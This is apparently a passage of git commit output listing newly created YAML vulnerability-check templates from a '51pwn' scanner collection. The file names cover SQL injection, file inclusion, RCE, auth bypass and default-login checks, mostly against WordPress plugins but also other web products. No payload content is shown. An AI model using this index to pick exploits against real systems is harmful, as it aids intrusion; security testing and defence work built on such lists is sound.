config/51pwn/yaml/WordPress/Wordpress-KBoard_Plugins-SQLi.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-MagicMembers_Plugins-DatabaseBackupDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Mail_Masta_Plugins-LFI.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-MainWP_Plugins-BypassLogin.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Media_Library_Categories_Plugins-SQLi.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-MiwoFTP_Plugins-ArbitraryFileDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Multiple_Themes-ArbitraryFileDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-NMedia_Website_Contact_Form-FileInclude.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-OPS_Old_Post_Spinner_Plugins-LFI.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Orbis_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Pagelines_Plugins-ArbitraryFileUpload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Photocart_Link_Plugins-LFI.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Plugin_404-XSS.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Private-InfoLeak.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Product_Catalog_Plugins-SQLi.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-RedSteel_Themes-ArbitraryFilesDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Revslider_Show_Image_Plugins-ArbitraryFilesDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Seo_Pressor-LeakAge.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Shopp_Plugins-DatabaseBackupDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Simple_Forum_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Social_Warfare_Plugins-RCE.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Ultimatum_Themes-FileDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-W3tc-InfoLeak.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-WP_BackupPlus_Plugins-InfoLeak.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-WP_Business_Directory_Plugins-DatabaseBackupDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-WP_EasyCart_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-WP_Mobile_Edition_Plugins-FileRead.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-WP_Quiz_Plugins-DatabaseBackupDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-WPide_ACE_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Windows_Desktop_and_iPhone_Photo_Uploader_Plugins-FileUpload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-WpEasyCart_LevelFourStoreFront_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Wysija_Newsletters_Plugins-DatabaseBackuDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-db-backup-InfoDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-force_download_Plugins-FileDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-jQuery-DomXSS.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-jQuery_Mega_Menu_Plugins-LFI.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-newwpml_Plugins-DatabaseBackupDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-setupconfig-InfoDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-submit_nex_form_Plugins-SQLi.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-wp_admin_admin_ajax-FileRead.yaml create mode 100755 config/51pwn/yaml/WordPress/accessibility-helper-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/ad-widget-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/admin-word-count-column-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/advanced-access-manager-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/age-gate-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/ait-csv-import-export-rce.yaml create mode 100755 config/51pwn/yaml/WordPress/alfacgiapi-wordpress.yaml create mode 100755 config/51pwn/yaml/WordPress/amministrazione-aperta-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/aspose-file-download.yaml create mode 100755 config/51pwn/yaml/WordPress/aspose-ie-file-download.yaml create mode 100755 config/51pwn/yaml/WordPress/aspose-pdf-file-download.yaml create mode 100755 config/51pwn/yaml/WordPress/aspose-words-file-download.yaml create mode 100755 config/51pwn/yaml/WordPress/attitude-theme-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/avada-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/brandfolder-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/brandfolder-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/cab-fare-calculator-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/candidate-application-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/cherry-file-download.yaml create mode 100755 config/51pwn/yaml/WordPress/church-admin-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/churchope-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/db-backup-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/diarise-theme-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/eatery-restaurant-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/elex-woocommerce-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/feedwordpress-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/flow-flow-social-stream-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/hb-audio-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/health-check-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/hide-security-enhancer-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/issuu-panel-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/mthemeunus-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/music-store-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/my-chatbot-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/nativechurch-wp-theme-lfd.yaml create mode 100755 config/51pwn/yaml/WordPress/newsletter-manager-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/ninjaform-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/pieregister-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/sassy-social-share-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/seo-redirection-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/shortcode-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/simple-image-manipulator-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/sniplets-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/sniplets-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/ultimatemember-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/video-synchro-pdf-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/w3c-total-cache-ssrf.yaml create mode 100755 config/51pwn/yaml/WordPress/weekender-newspaper-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-accessible-wpconfig.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-affiliatewp-log.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-db-backup-listing.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-db-backup.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-db-repair.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-directory-listing.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-git-config.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-infinitewp-auth-bypass.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-rce-simplefilelist.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-social-metrics-tracker.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-ssrf-oembed.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-total-upkeep-backup-download.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-upload-data.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-woocommerce-sqli.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-wordfence-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-wordfence-waf-bypass-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-wordfence-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-xmlrpc-brute-force.yaml create mode 100755 config/51pwn/yaml/WordPress/wordpress-zebra-form-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-adaptive-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-ambience-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-church-admin-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-config-setup.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-custom-tables-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-debug-log.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-finder-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-flagem-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-grimag-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-gtranslate-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-install.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-javospot-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-knews-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-memphis-documents-library-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-multiple-theme-ssrf.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-nextgen-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-oxygen-theme-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-phpfreechat-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-prostore-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-revslider-file-download.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-securimage-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-security-open-redirect.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-simple-fields-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-slideshow-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-socialfit-xss.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-spot-premium-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-tinymce-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-tutor-lfi.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-under-construction-ssrf.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-vault-local-file-inclusion.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-woocommerce-email-verification.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-woocommerce-file-download.yaml create mode 100755 config/51pwn/yaml/WordPress/wp-woocommerce-pdf-invoice-listing.yaml create mode 100755 config/51pwn/yaml/WordPress/wpconfig-aws-keys.yaml create mode 100755 config/51pwn/yaml/WordPress/wpdm-cache-session.yaml create mode 100755 config/51pwn/yaml/WordPress/wpmudev-pub-keys.yaml create mode 100755 config/51pwn/yaml/WordPress/wptouch-open-redirect.yaml create mode 100755 config/51pwn/yaml/Wowza Streaming Engine/CVE-2018-19365.yaml create mode 100755 config/51pwn/yaml/Wuzhicms/wuzhicms-sqli.yaml create mode 100755 config/51pwn/yaml/XDCMS/xdcms-sqli.yaml create mode 100755 config/51pwn/yaml/XWork/CVE-2010-1870.yaml create mode 100755 config/51pwn/yaml/XenMobile Server/CVE-2020-8209.yaml create mode 100755 config/51pwn/yaml/Xiaomi Mi WiFi R3G/CVE-2019-18371.yaml create mode 100755 config/51pwn/yaml/Xibo/CVE-2013-5979.yaml create mode 100755 config/51pwn/yaml/Xiuno BBS/CNVD-2019-01348.yaml create mode 100755 config/51pwn/yaml/YAPI/yapi-rce.yaml create mode 100755 config/51pwn/yaml/Yachtcontrol/CVE-2019-17270.yaml create mode 100755 config/51pwn/yaml/Yaws/CVE-2017-10974.yaml create mode 100755 config/51pwn/yaml/Yealink Device Management/CVE-2021-27561.yaml create mode 100755 config/51pwn/yaml/Yii/CVE-2020-15148.yaml create mode 100755 config/51pwn/yaml/YouPHPTube/CVE-2019-5127.yaml create mode 100755 config/51pwn/yaml/YunGouCMS/yungoucms-sqli.yaml create mode 100755 config/51pwn/yaml/Z-BlogPHP/CVE-2020-18268.yaml create mode 100755 config/51pwn/yaml/ZCMS/zcms-v3-sqli.yaml create mode 100755 config/51pwn/yaml/ZEIT Next.js/CVE-2017-16877.yaml create mode 100755 config/51pwn/yaml/ZEIT Next.js/CVE-2020-5284.yaml create mode 100755 config/51pwn/yaml/ZOHO ManageEngine Firewall Analyzer/CVE-2015-7780.yaml create mode 100755 config/51pwn/yaml/ZOHO ManageEngine OpManager/CVE-2020-12116.yaml create mode 100755 config/51pwn/yaml/ZOHO ManageEngine ServiceDesk/CVE-2017-11512.yaml create mode 100755 "config/51pwn/yaml/ZTE \350\260\203\345\210\266\350\247\243\350\260\203\345\231\250/CVE-2014-2321.yaml" create mode 100755 config/51pwn/yaml/ZZZPHP/CVE-2019-9041.yaml create mode 100755 config/51pwn/yaml/ZZZPHP/CVE-2022-23881.yaml create mode 100755 config/51pwn/yaml/Zarafa/CVE-2019-7219.yaml create mode 100755 config/51pwn/yaml/ZeroShell/CVE-2009-0545.yaml create mode 100755 config/51pwn/yaml/ZeroShell/CVE-2019-12725.yaml create mode 100755 config/51pwn/yaml/Zeta Producer Desktop CMS/CVE-2018-13980.yaml create mode 100755 config/51pwn/yaml/Zimbra Collaboration Suite/CVE-2013-7091.yaml create mode 100755 config/51pwn/yaml/Zimbra Collaboration Suite/CVE-2018-14013.yaml create mode 100755 config/51pwn/yaml/Zimbra Collaboration Suite/CVE-2019-9670.yaml create mode 100755 config/51pwn/yaml/Zimbra Collaboration Suite/CVE-2020-7796.yaml create mode 100755 config/51pwn/yaml/Zimbra Collaboration Suite/CVE-2022-37042.yaml create mode 100755 config/51pwn/yaml/Zimbra Collaboration Suite/zimbra-preauth-ssrf.yaml create mode 100755 config/51pwn/yaml/Zoho ManageEngine ADSelfService Plus/CVE-2021-37416.yaml create mode 100755 config/51pwn/yaml/Zoho ManageEngine ADSelfService Plus/CVE-2021-40539.yaml create mode 100755 "config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2019-9955.yaml" create mode 100755 "config/51pwn/yaml/ZyXEL VPN\351\230\262\347\201\253\345\242\231\350\256\276\345\244\207/CVE-2020-9054.yaml" create mode 100755 "config/51pwn/yaml/ZyXEL \346\227\240\347\272\277\347\275\221\345\205\263\350\256\276\345\244\207/CVE-2018-19326.yaml" create mode 100755 "config/51pwn/yaml/ZyXEL \350\267\257\347\224\261\345\231\250\350\256\276\345\244\207/CVE-2021-3297.yaml" create mode 100755 config/51pwn/yaml/ahwebexperts/ahwebexperts-car-details-sqli.yaml create mode 100755 config/51pwn/yaml/ahwebexperts/ahwebexperts-pagephp-sqli.yaml create mode 100755 config/51pwn/yaml/ahwebexperts/ahwebexperts-product-sqli.yaml create mode 100755 config/51pwn/yaml/arcms/Arcms-json_newslist-sqli.yaml create mode 100755 config/51pwn/yaml/arcms/CNVD-2018-26783_1.yaml create mode 100755 config/51pwn/yaml/arcms/bartarcms-allgallary-sqli.yaml create mode 100755 config/51pwn/yaml/aspcms/AspCms_OEM-info.yaml create mode 100755 config/51pwn/yaml/aspcms/Aspcms-Backend-Leak.yaml create mode 100755 config/51pwn/yaml/aspcms/wooyun-2015-0161677.yaml create mode 100755 config/51pwn/yaml/b2evolution/CVE-2020-22840.yaml create mode 100755 config/51pwn/yaml/bootcms/Bootcms_v1-goodsids-sqli.yaml create mode 100755 config/51pwn/yaml/bootcms/Bootcms_v1-homepage-sqli.yaml create mode 100755 config/51pwn/yaml/btoptionscom/btoptionscom-bnb-sqli.yaml create mode 100755 config/51pwn/yaml/btoptionscom/btoptionscom-financial-sqli.yaml create mode 100755 config/51pwn/yaml/btoptionscom/btoptionscom-financial_times-xss.yaml create mode 100755 config/51pwn/yaml/btoptionscom/btoptionscom-hbr_php-sqli.yaml create mode 100755 config/51pwn/yaml/btoptionscom/btoptionscom-newspack-sqli.yaml create mode 100755 config/51pwn/yaml/cartadis Cartadis Gespage/CVE-2021-33807.yaml create mode 100755 config/51pwn/yaml/cobubrazor/CNVD-2018-06472-1.yaml create mode 100755 config/51pwn/yaml/cobubrazor/CNVD-2018-06472.yaml create mode 100755 config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-generate-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-getConfigTest-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt2-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/cobubrazor_v8-commonDbfix-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/cobubrazor_v8-getUpdateTest-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/cobubrazor_v8-ipTest-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/cobubrazor_v8-postclientdataTest-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/cobubrazor_v8-posterrorTest-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/cobubrazor_v8-posteventTest-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/cobubrazor_v8-posttagTest-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/cobubrazor_v8-postusinglogTest-info.yaml create mode 100755 config/51pwn/yaml/cobubrazor/cobubrazor_v8-view_fixt2-info.yaml create mode 100755 config/51pwn/yaml/dompdf/CVE-2014-2383.yaml create mode 100755 config/51pwn/yaml/dotCMS/CVE-2018-17422.yaml create mode 100755 config/51pwn/yaml/e-mobile/E_mobile-sqli-flowimg.yaml create mode 100755 config/51pwn/yaml/e-mobile/wooyun-2015-0126024_2.yaml create mode 100755 config/51pwn/yaml/emlog/CVE-2021-3293.yaml create mode 100755 config/51pwn/yaml/etcd/http-etcd-unauthenticated-api-data-leak.yaml create mode 100755 config/51pwn/yaml/exacqVision/CVE-2020-9047.yaml create mode 100755 config/51pwn/yaml/feifeicms/feifeicms-lfr.yaml create mode 100755 config/51pwn/yaml/flexpapar/CVE-2018-11686.yaml create mode 100755 config/51pwn/yaml/flink/CVE-2020-17518.yaml create mode 100755 config/51pwn/yaml/flink/CVE-2020-17519.yaml create mode 100755 config/51pwn/yaml/flink/apache-flink-unauth-rce.yaml create mode 100755 config/51pwn/yaml/frp/frp-default-login.yaml create mode 100755 config/51pwn/yaml/frp/unauthenticated-frp.yaml create mode 100755 "config/51pwn/yaml/iAudit\350\277\220\347\273\264\345\256\241\350\256\241\347\263\273\347\273\237/Qilin-Bastion-HostRce.yaml" create mode 100755 config/51pwn/yaml/iPECS NMS 30M/CVE-2018-15138.yaml create mode 100755 config/51pwn/yaml/ifw8/CVE-2019-16313.yaml create mode 100755 config/51pwn/yaml/jeewms/jeewms-lfi.yaml create mode 100755 config/51pwn/yaml/jitsi/CVE-2021-26812.yaml create mode 100755 config/51pwn/yaml/jnoj/CVE-2019-17538.yaml create mode 100755 config/51pwn/yaml/klaussilveira GitList /CVE-2018-1000533.yaml create mode 100755 config/51pwn/yaml/kylin/CVE-2020-13937.yaml create mode 100755 config/51pwn/yaml/lighttpd/CVE-2014-2323.yaml create mode 100755 config/51pwn/yaml/log4j/CVE-2021-44228.yaml create mode 100755 config/51pwn/yaml/log4j/CVE-2021-45046.yaml create mode 100755 config/51pwn/yaml/mongoshake/alibaba-mongoshake-unauth.yaml create mode 100755 config/51pwn/yaml/nacos/CVE-2021-29442.yaml create mode 100755 config/51pwn/yaml/nacos/unauthenticated-nacos-access.yaml create mode 100755 config/51pwn/yaml/nifi/ApacheNifi-Api-UnauthorizedAccess.yaml create mode 100755 config/51pwn/yaml/nostromo nhttpd/CVE-2019-16278.yaml create mode 100755 config/51pwn/yaml/ntopng/CVE-2021-28073.yaml create mode 100755 config/51pwn/yaml/nweb2fax/CVE-2008-6668.yaml create mode 100755 config/51pwn/yaml/ofbiz/CVE-2018-8033.yaml create mode 100755 config/51pwn/yaml/ofbiz/CVE-2020-1943.yaml create mode 100755 config/51pwn/yaml/ofbiz/CVE-2020-9496.yaml create mode 100755 config/51pwn/yaml/ofbiz/CVE-2021-26295.yaml create mode 100755 config/51pwn/yaml/ofbiz/ofbiz-default-login.yaml create mode 100755 config/51pwn/yaml/opendreambox/CVE-2017-14135.yaml create mode 100755 config/51pwn/yaml/otter/poc-yaml-otter-default-password.yaml create mode 100755 config/51pwn/yaml/phpCollab/CVE-2017-6090.yaml create mode 100755 config/51pwn/yaml/phpMyAdmin/CVE-2009-1151.yaml create mode 100755 config/51pwn/yaml/phpMyAdmin/CVE-2018-12613.yaml create mode 100755 config/51pwn/yaml/phpMyAdmin/CVE-2019-12616.yaml create mode 100755 config/51pwn/yaml/phpMyAdmin/CVE-2022-23808.yaml create mode 100755 config/51pwn/yaml/phpMyAdmin/phpmyadmin-misconfiguration.yaml create mode 100755 config/51pwn/yaml/phpMyAdmin/phpmyadmin-setup.yaml create mode 100755 config/51pwn/yaml/phpMyAdmin/pma-server-import.yaml create mode 100755 config/51pwn/yaml/phpMyChat-Plus/CVE-2019-19908.yaml create mode 100755 config/51pwn/yaml/phpPgAdmin/CVE-2007-5728.yaml create mode 100755 config/51pwn/yaml/phpPgAdmin/CVE-2008-5587.yaml create mode 100755 config/51pwn/yaml/phpShowtime/CVE-2012-0981.yaml create mode 100755 config/51pwn/yaml/phpfastcache/CVE-2021-37704.yaml create mode 100755 config/51pwn/yaml/phpstudy/phpstudy-backdoor-rce.yaml create mode 100755 config/51pwn/yaml/rConfig/CVE-2019-16662.yaml create mode 100755 config/51pwn/yaml/rConfig/CVE-2020-10546.yaml create mode 100755 config/51pwn/yaml/rConfig/CVE-2020-10547.yaml create mode 100755 config/51pwn/yaml/rConfig/CVE-2020-10548.yaml create mode 100755 config/51pwn/yaml/rConfig/CVE-2020-10549.yaml create mode 100755 config/51pwn/yaml/rConfig/CVE-2020-13638.yaml create mode 100755 config/51pwn/yaml/rConfig/CVE-2020-9425.yaml create mode 100755 config/51pwn/yaml/satellian/CVE-2020-7980.yaml create mode 100755 config/51pwn/yaml/seacms/seacms-before-v992-rce.yaml create mode 100755 config/51pwn/yaml/seacms/seacms-rce.yaml create mode 100755 config/51pwn/yaml/seacms/seacms-sqli.yaml create mode 100755 config/51pwn/yaml/seacms/seacms-v654-rce.yaml create mode 100755 config/51pwn/yaml/seacms/seacmsv645-command-exec.yaml create mode 100755 config/51pwn/yaml/shadow/CVE-2020-20982.yaml create mode 100755 config/51pwn/yaml/shenyu/CVE-2021-37580.yaml create mode 100755 config/51pwn/yaml/shenyu/CVE-2022-23944.yaml create mode 100755 config/51pwn/yaml/shopxo/CNVD-2021-15822.yaml create mode 100755 config/51pwn/yaml/spark/spark-webui-unauth.yaml create mode 100755 config/51pwn/yaml/spark/unauth-spark-api.yaml create mode 100755 "config/51pwn/yaml/spring\346\241\206\346\236\266/CVE-2016-4977.yaml" create mode 100755 "config/51pwn/yaml/spring\346\241\206\346\236\266/CVE-2022-22965.yaml" create mode 100755 config/51pwn/yaml/storm/apache-storm-unauth.yaml create mode 100755 config/51pwn/yaml/twitter/CVE-2020-35774.yaml create mode 100755 config/51pwn/yaml/uWSGI/CVE-2018-7490.yaml create mode 100755 config/51pwn/yaml/vBulletin/CVE-2018-6200.yaml create mode 100755 config/51pwn/yaml/vBulletin/CVE-2019-16759.yaml create mode 100755 config/51pwn/yaml/vBulletin/CVE-2020-12720.yaml create mode 100755 config/51pwn/yaml/vBulletin/CVE-2020-17496.yaml create mode 100755 config/51pwn/yaml/webEdition CMS/CVE-2014-5258.yaml create mode 100755 config/51pwn/yaml/webmin/CVE-2019-15107.yaml create mode 100755 config/51pwn/yaml/webmin/webmin-panel.yaml create mode 100755 config/51pwn/yaml/websvn/CVE-2021-32305.yaml create mode 100755 config/51pwn/yaml/weiphp/CNVD-2020-68596.yaml create mode 100755 config/51pwn/yaml/weiphp/Weiphp-SQLi.yaml create mode 100755 config/51pwn/yaml/xunchi CMS/CNVD-2020-23735.yaml create mode 100755 config/51pwn/yaml/yccms/yccms-rce.yaml create mode 100755 config/51pwn/yaml/zzcms/zzcms-zsmanage-sqli.yaml create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/ssvid-89511.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-default-login.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-DossierBorrowAction.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-GovDocumentDossierAction.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-GovSendFileAction.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-NameCardAction.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-WorkflowCommonAction.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-desktop.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-outMailLoginCheck.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wanhuOA-sqli-savePersonInfo.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-063903.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-063903_2.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-064324.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-067391.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-075657.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-082128.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2015-0108823.yaml" create mode 100755 "config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2015-0116362.yaml" create mode 100755 "config/51pwn/yaml/\344\270\226\351\202\246IP\347\275\221\347\273\234\345\271\277\346\222\255\347\263\273\347\273\237/SponIpIntercom-File-Read.yaml" create mode 100755 "config/51pwn/yaml/\344\270\226\351\202\246IP\347\275\221\347\273\234\345\271\277\346\222\255\347\263\273\347\273\237/spon-ip-intercom-ping-rce.yaml" create mode 100755 "config/51pwn/yaml/\344\270\255\345\233\275\347\224\265\344\277\241\347\275\221\345\205\263\351\205\215\347\275\256\347\256\241\347\220\206\347\263\273\347\273\237/telecom-gateway-default-login.yaml" create mode 100755 "config/51pwn/yaml/\344\272\277\351\202\256\347\224\265\345\255\220\351\202\256\344\273\266\347\263\273\347\273\237/CNVD-2021-26422.yaml" create mode 100755 "config/51pwn/yaml/\345\205\211\347\214\253/Chinaunicom-Default-Login.yaml" create mode 100755 "config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-HG532e-default-login.yaml" create mode 100755 